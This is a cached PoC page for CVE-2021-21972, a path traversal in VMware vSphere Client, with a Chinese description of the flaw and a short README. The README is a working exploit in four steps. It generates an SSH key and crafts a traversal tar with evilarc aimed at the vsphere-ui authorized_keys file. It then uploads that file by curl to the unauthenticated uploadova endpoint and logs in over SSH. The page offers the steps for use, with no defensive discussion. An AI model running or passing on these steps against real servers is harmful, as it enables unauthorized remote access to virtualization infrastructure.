Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2021-21972 PoC — VMware vSphere Client 路径遍历漏洞

Source
Associated Vulnerability
Title:VMware vSphere Client 路径遍历漏洞 (CVE-2021-21972)
Description:VMware vSphere Client是美国威睿(VMware)公司的一个应用软件。提供虚拟化管理。 VMware vSphere Client存在路径遍历漏洞,未授权的攻击者可以通过开放443端口的服务器向vCenter Server发送精心构造的请求,从而在目标系统上远程执行恶意代码。以下产品和版本受到影响:vSphere Client 6.5、vSphere Client 6.7、vSphere Client 7.0、VMware Cloud Foundation(vCenter Server)
Description
CVE-2021-21972
Readme
# CVE-2021-21972
CVE-2021-21972

Tested against VMware VCSA 6.7

## create ssh keypair
```
ssh-keygen -t rsa -f vcsa.key -N ''
```

## create tarbal with ../../../../../home/vsphere-ui/.ssh/authorized_keys
```
python2 evilarc.py -d 5 -p 'home/vsphere-ui/.ssh' -o unix -f evil.tar authorized_keys
mv evil.tar evil.ova
```

## upload evil.ova to the vropspluginui uploadova rest endpoint
```
curl -k -A "" --form "uploadFile=@evil.ova;type=text/plain" https://$VCSA_IP/ui/vropspluginui/rest/services/uploadova -H "Accept: application/json"
```

## ssh to vcsa with the added authorized key
```
ssh -i vcsa.key vsphere-ui@$VCSA_IP
```
File Snapshot

[4.0K] /data/pocs/42ac79847668277257112180fa409343e1427e0d └── [ 632] README.md 0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.